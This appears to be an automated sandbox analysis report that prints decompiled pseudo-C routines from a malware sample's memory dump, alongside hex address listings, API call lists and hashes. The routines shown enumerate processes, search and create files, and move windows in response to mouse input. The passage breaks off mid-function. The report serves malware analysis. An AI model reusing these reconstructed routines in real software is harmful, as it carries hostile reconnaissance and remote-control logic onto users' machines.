                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289be8
                                                                                              0x04289bea
                                                                                              0x04289bec
                                                                                              0x04289bee
                                                                                              0x04289bf0
                                                                                              0x04289bf2
                                                                                              0x04289bf4
                                                                                              0x04289bff
                                                                                              0x00000000
                                                                                              0x04289bff
                                                                                              0x04289bf4
                                                                                              0x04289bf0
                                                                                              0x00000000
                                                                                              0x04289bec
                                                                                              0x04289c05
                                                                                              0x04289c07
                                                                                              0x04289c0a
                                                                                              0x04289c23
                                                                                              0x04289c23
                                                                                              0x04289c25
                                                                                              0x04289c28
                                                                                              0x04289c38
                                                                                              0x04289c3a
                                                                                              0x04289c3a
                                                                                              0x04289c2a
                                                                                              0x04289c2a
                                                                                              0x04289c2d
                                                                                              0x00000000
                                                                                              0x04289c2f
                                                                                              0x04289c2f
                                                                                              0x04289c32
                                                                                              0x00000000
                                                                                              0x04289c34
                                                                                              0x04289c34
                                                                                              0x04289c34
                                                                                              0x04289c32
                                                                                              0x04289c2d
                                                                                              0x04289c40
                                                                                              0x04289c48
                                                                                              0x04289c4c
                                                                                              0x04289c5a
                                                                                              0x04289c5f
                                                                                              0x04289c74
                                                                                              0x04289c76
                                                                                              0x04289c7c
                                                                                              0x04289c7f
                                                                                              0x04289cb1
                                                                                              0x04289cb1
                                                                                              0x04289cb3
                                                                                              0x04289cb6
                                                                                              0x04289cbc
                                                                                              0x04289cbc
                                                                                              0x04289cc3
                                                                                              0x04289cdd
                                                                                              0x04289cdd
                                                                                              0x04289cec
                                                                                              0x04289cf1
                                                                                              0x04289cf4
                                                                                              0x04289cf6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289cc5
                                                                                              0x04289cc5
                                                                                              0x04289ccb
                                                                                              0x04289ccd
                                                                                              0x00000000
                                                                                              0x04289ccf
                                                                                              0x04289ccf
                                                                                              0x04289cd2
                                                                                              0x00000000
                                                                                              0x04289cd4
                                                                                              0x04289cd4
                                                                                              0x04289cdb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289cdb
                                                                                              0x04289cd2
                                                                                              0x04289ccd
                                                                                              0x00000000
                                                                                              0x04289cf8
                                                                                              0x04289d00
                                                                                              0x04289d06
                                                                                              0x04289d08
                                                                                              0x04289d08
                                                                                              0x04289d10
                                                                                              0x04289d15
                                                                                              0x04289d1d
                                                                                              0x04289d20
                                                                                              0x04289d22
                                                                                              0x04289d36
                                                                                              0x04289d3b
                                                                                              0x04289c81
                                                                                              0x04289c81
                                                                                              0x04289c85
                                                                                              0x04289c8d
                                                                                              0x04289c8d
                                                                                              0x04289c8d
                                                                                              0x04289c8f
                                                                                              0x04289c92
                                                                                              0x04289c95
                                                                                              0x04289c95
                                                                                              0x04289c0c
                                                                                              0x04289c0f
                                                                                              0x04289c11
                                                                                              0x00000000
                                                                                              0x04289c13
                                                                                              0x04289c13
                                                                                              0x04289c19
                                                                                              0x04289c1e
                                                                                              0x04289c11
                                                                                              0x04289c9d
                                                                                              0x04289ca2
                                                                                              0x04289cad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289b7b
                                                                                              0x04289b4f
                                                                                              0x04289b51
                                                                                              0x04289bad
                                                                                              0x04289bb1
                                                                                              0x04289bb1

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: ccd3b5f64cf05a7929823836eabd482d73080a2f947f5ce646c229f1a0c80ad9
                                                                                              • Instruction ID: 76f6440bd29724da7648949b2d2b53e50e6fca785a4be92f4354698930a8f699
                                                                                              • Opcode Fuzzy Hash: ccd3b5f64cf05a7929823836eabd482d73080a2f947f5ce646c229f1a0c80ad9
                                                                                              • Instruction Fuzzy Hash: 3831E5B1A1114AAFDB24EE78CC84EFE7BBDDF85314F0401ACE91997281E631A9858B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E042556D0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v12;
                                                                                              				char _v16;
                                                                                              				char _v24;
                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                              				char _v620;
                                                                                              				signed int _t23;
                                                                                              				signed int _t25;
                                                                                              				short _t27;
                                                                                              				short _t29;
                                                                                              				void* _t40;
                                                                                              				intOrPtr* _t42;
                                                                                              				signed int _t43;
                                                                                              				signed int _t44;
                                                                                              				signed int _t46;
                                                                                              				intOrPtr _t50;
                                                                                              				intOrPtr* _t56;
                                                                                              				void* _t58;
                                                                                              				void* _t60;
                                                                                              				WCHAR* _t61;
                                                                                              				void* _t62;
                                                                                              				signed int _t63;
                                                                                              
                                                                                              				_t40 = __ebx;
                                                                                              				_t23 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t23 ^ _t63;
                                                                                              				_t56 = _a4 + 8;
                                                                                              				_t58 = __ecx;
                                                                                              				if( *_t56 != 0) {
                                                                                              					_t42 = _t56;
                                                                                              					_t60 = _t42 + 2;
                                                                                              					do {
                                                                                              						_t25 =  *_t42;
                                                                                              						_t42 = _t42 + 2;
                                                                                              						__eflags = _t25;
                                                                                              					} while (_t25 != 0);
                                                                                              					_t43 = _t42 - _t60;
                                                                                              					__eflags = _t43;
                                                                                              					_t44 = _t43 >> 1;
                                                                                              				} else {
                                                                                              					_t44 = 0;
                                                                                              				}
                                                                                              				_push(_t44);
                                                                                              				_t61 = _t58 + 0x18;
                                                                                              				_t45 = _t61;
                                                                                              				E042532A0(_t61, _t56);
                                                                                              				_t65 = _t61[0xa] - 8;
                                                                                              				if(_t61[0xa] < 8) {
                                                                                              					_t27 = _t61;
                                                                                              				} else {
                                                                                              					_t27 =  *_t61;
                                                                                              				}
                                                                                              				E04254670(_t45, _t65, _t27);
                                                                                              				_t46 =  *(_t58 + 0x28);
                                                                                              				if(_t61[0xa] < 8) {
                                                                                              					_t29 = _t61;
                                                                                              				} else {
                                                                                              					_t29 =  *_t61;
                                                                                              				}
                                                                                              				if( *((short*)(_t29 + _t46 * 2 - 2)) != 0x5c) {
                                                                                              					__eflags = _t61[0xa] - 8;
                                                                                              					if(_t61[0xa] >= 8) {
                                                                                              						_t61 =  *_t61;
                                                                                              					}
                                                                                              					_t62 = FindFirstFileW(_t61,  &_v616);
                                                                                              					__eflags = _t62 - 0xffffffff;
                                                                                              					if(_t62 == 0xffffffff) {
                                                                                              						L20:
                                                                                              						E042557F0(_t40, _t58, _t58, _t62);
                                                                                              					} else {
                                                                                              						_t50 =  *((intOrPtr*)(_t58 + 0x14));
                                                                                              						__eflags = _t50 - 4;
                                                                                              						if(_t50 == 4) {
                                                                                              							goto L20;
                                                                                              						} else {
                                                                                              							__eflags = _t50 - 2;
                                                                                              							if(_t50 == 2) {
                                                                                              								goto L20;
                                                                                              							} else {
                                                                                              								__eflags = _t50 - 6;
                                                                                              								if(_t50 == 6) {
                                                                                              									goto L20;
                                                                                              								} else {
                                                                                              									_push(_t50);
                                                                                              									_push(0x3f);
                                                                                              									_push(1);
                                                                                              									_push( &_v620);
                                                                                              									_v620 = 0x6e;
                                                                                              									E04251C60( *((intOrPtr*)(_t58 + 4)));
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					FindClose(_t62);
                                                                                              					__eflags = _v12 ^ _t63;
                                                                                              					return E04275AFE(_v12 ^ _t63);
                                                                                              				} else {
                                                                                              					_push(_t46);
                                                                                              					_push(0x3f);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_v16 = 0;
                                                                                              					_push(9);
                                                                                              					asm("movq [ebp-0x14], xmm0");
                                                                                              					_v24 = 0x71;
                                                                                              					E04251C60( *((intOrPtr*)(_t58 + 4)));
                                                                                              					return E04275AFE(_v12 ^ _t63,  &_v24);
                                                                                              				}
                                                                                              			}
























                                                                                              0x042556d0
                                                                                              0x042556d9
                                                                                              0x042556e0
                                                                                              0x042556e6
                                                                                              0x042556eb
                                                                                              0x042556f1
                                                                                              0x042556f7
                                                                                              0x042556f9
                                                                                              0x04255700
                                                                                              0x04255700
                                                                                              0x04255703
                                                                                              0x04255706
                                                                                              0x04255706
                                                                                              0x0425570b
                                                                                              0x0425570b
                                                                                              0x0425570d
                                                                                              0x042556f3
                                                                                              0x042556f3
                                                                                              0x042556f3
                                                                                              0x0425570f
                                                                                              0x04255710
                                                                                              0x04255714
                                                                                              0x04255716
                                                                                              0x0425571b
                                                                                              0x0425571f
                                                                                              0x04255725
                                                                                              0x04255721
                                                                                              0x04255721
                                                                                              0x04255721
                                                                                              0x04255728
                                                                                              0x04255731
                                                                                              0x04255734
                                                                                              0x0425573a
                                                                                              0x04255736
                                                                                              0x04255736
                                                                                              0x04255736
                                                                                              0x04255742
                                                                                              0x04255777
                                                                                              0x0425577b
                                                                                              0x0425577d
                                                                                              0x0425577d
                                                                                              0x0425578d
                                                                                              0x0425578f
                                                                                              0x04255792
                                                                                              0x042557c3
                                                                                              0x042557c5
                                                                                              0x04255794
                                                                                              0x04255794
                                                                                              0x04255797
                                                                                              0x0425579a
                                                                                              0x00000000
                                                                                              0x0425579c
                                                                                              0x0425579c
                                                                                              0x0425579f
                                                                                              0x00000000
                                                                                              0x042557a1
                                                                                              0x042557a1
                                                                                              0x042557a4
                                                                                              0x00000000
                                                                                              0x042557a6
                                                                                              0x042557a6
                                                                                              0x042557b0
                                                                                              0x042557b2
                                                                                              0x042557b4
                                                                                              0x042557b5
                                                                                              0x042557bc
                                                                                              0x042557bc
                                                                                              0x042557a4
                                                                                              0x0425579f
                                                                                              0x0425579a
                                                                                              0x042557cb
                                                                                              0x042557d5
                                                                                              0x042557e0
                                                                                              0x04255744
                                                                                              0x04255744
                                                                                              0x0425574b
                                                                                              0x0425574d
                                                                                              0x04255750
                                                                                              0x04255754
                                                                                              0x04255756
                                                                                              0x0425575c
                                                                                              0x04255760
                                                                                              0x04255774
                                                                                              0x04255774

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 04255787
                                                                                              • FindClose.KERNEL32(00000000), ref: 042557CB
                                                                                                • Part of subcall function 042557F0: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04255844
                                                                                                • Part of subcall function 042557F0: FindClose.KERNEL32(00000000,?,00000000), ref: 042558AA
                                                                                                • Part of subcall function 042557F0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 042558CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirst$Create
                                                                                              • String ID:
                                                                                              • API String ID: 2053571766-0
                                                                                              • Opcode ID: a35ec5adba3f413493456f1f9ec95ba3b69a36c8f05fa16be50cf7f468eba842
                                                                                              • Instruction ID: b7bb0eb6da7e72e5e43b5ce18f0e90f2a40921c0bee10ad22a74abc78af9a8f8
                                                                                              • Opcode Fuzzy Hash: a35ec5adba3f413493456f1f9ec95ba3b69a36c8f05fa16be50cf7f468eba842
                                                                                              • Instruction Fuzzy Hash: 48313730B20205EBD724EF28D884ABDB3B5EF45714F10029DDC06575A4DB7079D1CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E04264C00(void* __ebx, void* __edx, long __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v16;
                                                                                              				char _v532;
                                                                                              				char _v540;
                                                                                              				short _v548;
                                                                                              				char _v1052;
                                                                                              				char _v1060;
                                                                                              				short _v1068;
                                                                                              				char _v1572;
                                                                                              				char _v1580;
                                                                                              				short _v1588;
                                                                                              				char _v2092;
                                                                                              				char _v2100;
                                                                                              				short _v2108;
                                                                                              				char _v2612;
                                                                                              				char _v2620;
                                                                                              				short _v2628;
                                                                                              				intOrPtr _v2636;
                                                                                              				intOrPtr _v2640;
                                                                                              				int _v2644;
                                                                                              				intOrPtr _v2648;
                                                                                              				char _v2652;
                                                                                              				void* _v2656;
                                                                                              				signed int _v2660;
                                                                                              				intOrPtr _v2668;
                                                                                              				char _v2676;
                                                                                              				short _v3200;
                                                                                              				intOrPtr _v3212;
                                                                                              				intOrPtr _v3216;
                                                                                              				long _v3220;
                                                                                              				char _v3224;
                                                                                              				void* _v3228;
                                                                                              				void* _v3232;
                                                                                              				void* _v3236;
                                                                                              				void* _v3244;
                                                                                              				int _v3248;
                                                                                              				long _v3252;
                                                                                              				void* _v3256;
                                                                                              				void* _v3260;
                                                                                              				long _v3264;
                                                                                              				signed int _t135;
                                                                                              				long _t160;
                                                                                              				_Unknown_base(*)()* _t170;
                                                                                              				void* _t172;
                                                                                              				int _t176;
                                                                                              				int _t178;
                                                                                              				int _t180;
                                                                                              				int _t184;
                                                                                              				int _t186;
                                                                                              				signed int _t208;
                                                                                              				void* _t253;
                                                                                              				void* _t255;
                                                                                              				void* _t257;
                                                                                              				void* _t258;
                                                                                              				void* _t265;
                                                                                              				long _t283;
                                                                                              				long _t284;
                                                                                              				void* _t285;
                                                                                              				void* _t287;
                                                                                              				void* _t289;
                                                                                              				void* _t291;
                                                                                              				void* _t292;
                                                                                              				void* _t293;
                                                                                              				void* _t295;
                                                                                              				void* _t297;
                                                                                              				void* _t298;
                                                                                              				void* _t300;
                                                                                              				void* _t303;
                                                                                              				signed int _t304;
                                                                                              				signed int _t306;
                                                                                              				signed int _t312;
                                                                                              				void* _t315;
                                                                                              				void* _t316;
                                                                                              
                                                                                              				_t273 = __edi;
                                                                                              				_t269 = __edx;
                                                                                              				_t306 = (_t304 & 0xfffffff8) - 0xcac;
                                                                                              				_t135 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t135 ^ _t306;
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_push(__edi);
                                                                                              				E0427DEA0(__edi,  &_v3220, 0, 0x22c);
                                                                                              				E0427DEA0(_t273,  &_v2612, 0, 0x208);
                                                                                              				E0427DEA0(_t273,  &_v2092, 0, 0x208);
                                                                                              				E0427DEA0(_t273,  &_v1572, 0, 0x208);
                                                                                              				E0427DEA0(_t273,  &_v1052, 0, 0x208);
                                                                                              				E0427DEA0(_t273,  &_v532, 0, 0x208);
                                                                                              				_t312 = _t306 + 0x48;
                                                                                              				_v2640 = 7;
                                                                                              				_v2644 = 0;
                                                                                              				_v2660 = 0;
                                                                                              				_t253 = CreateToolhelp32Snapshot(2, 0);
                                                                                              				_v3228 = _t253;
                                                                                              				if(_t253 != 0xffffffff) {
                                                                                              					_v3224 = 0x22c;
                                                                                              					_t300 = LocalAlloc(0x40, 0x19000);
                                                                                              					_t273 = 1;
                                                                                              					_v3248 = _t300;
                                                                                              					_push( &_v3224);
                                                                                              					 *_t300 = 0x80;
                                                                                              					_v3252 = 1;
                                                                                              					if(Process32FirstW(_t253) != 0) {
                                                                                              						_t303 = lstrlenW;
                                                                                              						do {
                                                                                              							_t255 = OpenProcess(0x410, 0, _v3220);
                                                                                              							_t160 = _v3220;
                                                                                              							_v3236 = _t255;
                                                                                              							if(_t160 != 0 && _t160 != 4 && _t160 != 8) {
                                                                                              								_push(_t258);
                                                                                              								E042645C0(_t255, _t255,  &_v2620, _t273, _t303);
                                                                                              								E04265DD0(_t255,  &_v2620,  &_v1580, _t273, _t303,  &_v1060,  &_v540);
                                                                                              								_t265 = _t255;
                                                                                              								E04264440(_t265,  &_v2100, _t273, _t303);
                                                                                              								_t315 = _t312 + 0xc;
                                                                                              								_v3244 = 0;
                                                                                              								_t170 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                              								if(_t170 != 0) {
                                                                                              									_t265 =  &_v3244;
                                                                                              									 *_t170(_t255, _t265);
                                                                                              								}
                                                                                              								_v3248 = 0;
                                                                                              								__imp__ProcessIdToSessionId(_v3220,  &_v3248);
                                                                                              								_t269 = _v3228;
                                                                                              								_push(_t265);
                                                                                              								_t172 = E04256060(_t255,  &_v2652, _v3228, _t273, _t303);
                                                                                              								_t316 = _t315 + 4;
                                                                                              								E04265370(_t255,  &_v2676, _t172);
                                                                                              								_t174 = _v2636;
                                                                                              								if(_v2636 >= 8) {
                                                                                              									E04253540(_t255, _t269, _t273, _v2652, _t174 + 1);
                                                                                              								}
                                                                                              								_t176 = lstrlenW( &_v3200);
                                                                                              								_t178 = lstrlenW( &_v548);
                                                                                              								_t180 = lstrlenW( &_v1068);
                                                                                              								_v3248 = _t176 + _t178 + _t180 + lstrlenW( &_v1588);
                                                                                              								_t184 = lstrlenW( &_v2108);
                                                                                              								_t186 = lstrlenW( &_v2628);
                                                                                              								_t257 = _v3260;
                                                                                              								_t283 = _v3264 + 0x22 + _t186 + _v2660 + _t184 + _v3248 + _t186 + _v2660 + _t184 + _v3248;
                                                                                              								if(LocalSize(_t257) < _t283) {
                                                                                              									_t257 = LocalReAlloc(_t257, _t283, 0x42);
                                                                                              									_v3260 = _t257;
                                                                                              								}
                                                                                              								_t284 = _v3264;
                                                                                              								 *(_t284 + _t257) = _v3228;
                                                                                              								 *((intOrPtr*)(_t284 + _t257 + 4)) = _v3212;
                                                                                              								 *((intOrPtr*)(_t284 + _t257 + 8)) = _v3216;
                                                                                              								_t285 = _t284 + 0xc;
                                                                                              								E0427E060(_t285 + _t257,  &_v3200, 2 + lstrlenW( &_v3200) * 2);
                                                                                              								_t287 = _t285 + lstrlenW( &_v3200) * 2 + 2;
                                                                                              								E0427E060(_t287 + _t257,  &_v2628, 2 + lstrlenW( &_v2628) * 2);
                                                                                              								_t208 = lstrlenW( &_v2628);
                                                                                              								_t258 =  >=  ? _v2676 :  &_v2676;
                                                                                              								_t289 = _t287 + _t208 * 2 + 2;
                                                                                              								E0427E060(_t289 + _t257, _t258, 2 + _v2660 * 2);
                                                                                              								_t291 = _t289 + _v2660 * 2 + 2;
                                                                                              								E0427E060(_t291 + _t257,  &_v2108, 2 + lstrlenW( &_v2108) * 2);
                                                                                              								_t292 = _t291 + lstrlenW( &_v2108) * 2;
                                                                                              								 *((intOrPtr*)(_t292 + _t257 + 2)) = _v3256;
                                                                                              								_t293 = _t292 + 6;
                                                                                              								E0427E060(_t293 + _t257,  &_v1588, 2 + lstrlenW( &_v1588) * 2);
                                                                                              								_t295 = _t293 + lstrlenW( &_v1588) * 2 + 2;
                                                                                              								E0427E060(_t295 + _t257,  &_v1068, 2 + lstrlenW( &_v1068) * 2);
                                                                                              								_t297 = _t295 + lstrlenW( &_v1068) * 2 + 2;
                                                                                              								E0427E060(_t297 + _t257,  &_v548, 2 + lstrlenW( &_v548) * 2);
                                                                                              								_t312 = _t316 + 0x54;
                                                                                              								_t298 = _t297 + lstrlenW( &_v548) * 2;
                                                                                              								 *(_t298 + _t257 + 2) = _v3252;
                                                                                              								_t273 = _t298 + 6;
                                                                                              								_t255 = _v3244;
                                                                                              								_v3264 = _t273;
                                                                                              							}
                                                                                              							CloseHandle(_t255);
                                                                                              							_t253 = _v3232;
                                                                                              						} while (Process32NextW(_t253,  &_v3228) != 0);
                                                                                              						_t300 = _v3256;
                                                                                              					}
                                                                                              					LocalReAlloc(_t300, _t273, 0x42);
                                                                                              					CloseHandle(_t253);
                                                                                              				} else {
                                                                                              				}
                                                                                              				_t259 = _v2648;
                                                                                              				if(_v2648 >= 8) {
                                                                                              					E04253540(_t253, _t269, _t273, _v2668, _t259 + 1);
                                                                                              				}
                                                                                              				return E04275AFE(_v16 ^ _t312);
                                                                                              			}












































































                                                                                              0x04264c00
                                                                                              0x04264c00
                                                                                              0x04264c06
                                                                                              0x04264c0c
                                                                                              0x04264c13
                                                                                              0x04264c1a
                                                                                              0x04264c1b
                                                                                              0x04264c1c
                                                                                              0x04264c29
                                                                                              0x04264c40
                                                                                              0x04264c57
                                                                                              0x04264c6e
                                                                                              0x04264c85
                                                                                              0x04264c9c
                                                                                              0x04264ca1
                                                                                              0x04264ca4
                                                                                              0x04264cb1
                                                                                              0x04264cbc
                                                                                              0x04264ccd
                                                                                              0x04264ccf
                                                                                              0x04264cd6
                                                                                              0x04264ce6
                                                                                              0x04264cf4
                                                                                              0x04264cf6
                                                                                              0x04264cff
                                                                                              0x04264d03
                                                                                              0x04264d05
                                                                                              0x04264d08
                                                                                              0x04264d14
                                                                                              0x04264d1a
                                                                                              0x04264d20
                                                                                              0x04264d31
                                                                                              0x04264d33
                                                                                              0x04264d37
                                                                                              0x04264d3d
                                                                                              0x04264d55
                                                                                              0x04264d5f
                                                                                              0x04264d85
                                                                                              0x04264d94
                                                                                              0x04264d96
                                                                                              0x04264d9b
                                                                                              0x04264d9e
                                                                                              0x04264db7
                                                                                              0x04264dbf
                                                                                              0x04264dc1
                                                                                              0x04264dc7
                                                                                              0x04264dc7
                                                                                              0x04264dcd
                                                                                              0x04264dda
                                                                                              0x04264de0
                                                                                              0x04264de4
                                                                                              0x04264dec
                                                                                              0x04264df1
                                                                                              0x04264dfc
                                                                                              0x04264e01
                                                                                              0x04264e0b
                                                                                              0x04264e16
                                                                                              0x04264e16
                                                                                              0x04264e27
                                                                                              0x04264e33
                                                                                              0x04264e3f
                                                                                              0x04264e57
                                                                                              0x04264e5b
                                                                                              0x04264e68
                                                                                              0x04264e6e
                                                                                              0x04264e7e
                                                                                              0x04264e88
                                                                                              0x04264e94
                                                                                              0x04264e96
                                                                                              0x04264e96
                                                                                              0x04264e9a
                                                                                              0x04264ea2
                                                                                              0x04264ea9
                                                                                              0x04264eb1
                                                                                              0x04264eba
                                                                                              0x04264ed0
                                                                                              0x04264eea
                                                                                              0x04264f03
                                                                                              0x04264f13
                                                                                              0x04264f24
                                                                                              0x04264f36
                                                                                              0x04264f46
                                                                                              0x04264f60
                                                                                              0x04264f79
                                                                                              0x04264f8b
                                                                                              0x04264f92
                                                                                              0x04264f96
                                                                                              0x04264fb7
                                                                                              0x04264fd4
                                                                                              0x04264fed
                                                                                              0x0426500a
                                                                                              0x04265023
                                                                                              0x04265028
                                                                                              0x04265035
                                                                                              0x0426503c
                                                                                              0x04265040
                                                                                              0x04265043
                                                                                              0x04265047
                                                                                              0x04265047
                                                                                              0x0426504c
                                                                                              0x04265052
                                                                                              0x04265062
                                                                                              0x0426506a
                                                                                              0x0426506a
                                                                                              0x04265072
                                                                                              0x0426507b
                                                                                              0x04264cd8
                                                                                              0x04264cd8
                                                                                              0x04265081
                                                                                              0x0426508b
                                                                                              0x04265096
                                                                                              0x04265096
                                                                                              0x042650b1

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04264CC7
                                                                                              • LocalAlloc.KERNEL32(00000040,00019000), ref: 04264CEE
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04264D0C
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,0000022C), ref: 04264D2B
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04264DB0
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04264DB7
                                                                                              • ProcessIdToSessionId.KERNEL32(?,?), ref: 04264DDA
                                                                                              • lstrlenW.KERNEL32(?,00000000), ref: 04264E27
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264E33
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264E3F
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264E4B
                                                                                              • lstrlenW.KERNEL32(?), ref: 04264E5B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Process$AddressAllocCreateFirstLibraryLoadLocalOpenProcProcess32SessionSnapshotToolhelp32
                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                              • API String ID: 1515997778-3024904723
                                                                                              • Opcode ID: 96497a555b0add3aed5cf9cfbb4a53bf391ee72ec87ed3f4a184c6d1fa8ec228
                                                                                              • Instruction ID: 0d5c9b2ef763a3edc2cb3643c6a92650a0b4b783883b27365ad329fc5ede24fa
                                                                                              • Opcode Fuzzy Hash: 96497a555b0add3aed5cf9cfbb4a53bf391ee72ec87ed3f4a184c6d1fa8ec228
                                                                                              • Instruction Fuzzy Hash: 79D13EB2614345ABD721DF64EC89BDBB7ECFB84304F400A2AE589D3150EB74A558CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E04256FD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                                                              				signed int _v8;
                                                                                              				char _v276;
                                                                                              				struct _WINDOWPLACEMENT _v320;
                                                                                              				struct tagRECT _v336;
                                                                                              				struct HWND__* _v340;
                                                                                              				struct tagPOINT _v348;
                                                                                              				struct tagPOINT _v356;
                                                                                              				int _v360;
                                                                                              				signed int _t87;
                                                                                              				unsigned int _t91;
                                                                                              				signed short _t93;
                                                                                              				int _t95;
                                                                                              				struct HWND__* _t106;
                                                                                              				signed int _t110;
                                                                                              				int _t123;
                                                                                              				long _t124;
                                                                                              				struct HMENU__* _t126;
                                                                                              				void* _t132;
                                                                                              				signed short _t139;
                                                                                              				struct HWND__* _t142;
                                                                                              				void* _t145;
                                                                                              				struct tagPOINT _t147;
                                                                                              				int _t151;
                                                                                              				int _t154;
                                                                                              				intOrPtr _t157;
                                                                                              				long _t158;
                                                                                              				int _t163;
                                                                                              				struct HMENU__* _t164;
                                                                                              				signed short _t166;
                                                                                              				struct HWND__* _t167;
                                                                                              				int _t171;
                                                                                              				struct HWND__* _t172;
                                                                                              				int _t173;
                                                                                              				signed int _t176;
                                                                                              				signed int _t178;
                                                                                              
                                                                                              				_t178 = (_t176 & 0xfffffff8) - 0x164;
                                                                                              				_t87 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t87 ^ _t178;
                                                                                              				_v360 = 0;
                                                                                              				_t157 = __ecx;
                                                                                              				_v348.y = __ecx;
                                                                                              				if(_a4 + 0xffffff00 > 2) {
                                                                                              					_t91 = _a12;
                                                                                              					_t166 =  *(__ecx + 0x78);
                                                                                              					_t147 = _t91;
                                                                                              					_t93 = _t91 >> 0x10;
                                                                                              					_push(_t93);
                                                                                              					_v360 = 1;
                                                                                              					_v356.x = _t147;
                                                                                              					_v356.y = _t93;
                                                                                              					_v348.x =  *(__ecx + 0x74);
                                                                                              					 *(__ecx + 0x74) = _t147;
                                                                                              					 *(__ecx + 0x78) = _t93;
                                                                                              					_t142 = WindowFromPoint(_t147);
                                                                                              					_t95 = _a4;
                                                                                              					if(_t95 != 0x202) {
                                                                                              						if(_t95 != 0x201) {
                                                                                              							if(_t95 != 0x200) {
                                                                                              								goto L2;
                                                                                              							}
                                                                                              							_t106 =  *(_t157 + 0x7c);
                                                                                              							_v340 = _t106;
                                                                                              							if(_t106 == 0) {
                                                                                              								goto L2;
                                                                                              							}
                                                                                              							_t145 = _v348 - _v356.x;
                                                                                              							_v360 = _t166 - _v356.y;
                                                                                              							GetWindowRect(_t106,  &_v336);
                                                                                              							_t151 = _v336.left;
                                                                                              							_t171 = _v336.right - _t151;
                                                                                              							_t154 = _v336.top;
                                                                                              							_t110 =  *((intOrPtr*)(_v348.y + 0x80)) + 0xfffffffe;
                                                                                              							_t163 = _v336.bottom - _t154;
                                                                                              							if(_t110 > 0xf) {
                                                                                              								L42:
                                                                                              								MoveWindow(_v340, _t151, _t154, _t171, _t163, 0);
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							switch( *((intOrPtr*)(_t110 * 4 +  &M04257414))) {
                                                                                              								case 0:
                                                                                              									MoveWindow(_v340, _t151 - _t145, _t154 - _v360, _t171, _t163, 0);
                                                                                              									goto L11;
                                                                                              								case 1:
                                                                                              									goto L42;
                                                                                              								case 2:
                                                                                              									L37:
                                                                                              									__esi = __ebx + __esi;
                                                                                              									__ecx = __ecx - __ebx;
                                                                                              									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                              									goto L11;
                                                                                              								case 3:
                                                                                              									L41:
                                                                                              									__esi = __esi - __ebx;
                                                                                              									goto L42;
                                                                                              								case 4:
                                                                                              									__edi = __edi + _v360;
                                                                                              									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                              									goto L11;
                                                                                              								case 5:
                                                                                              									__edx = __edx - _v360;
                                                                                              									__edi = __edi + _v360;
                                                                                              									goto L37;
                                                                                              								case 6:
                                                                                              									__edx = __edx - _v360;
                                                                                              									__edi = __edi + _v360;
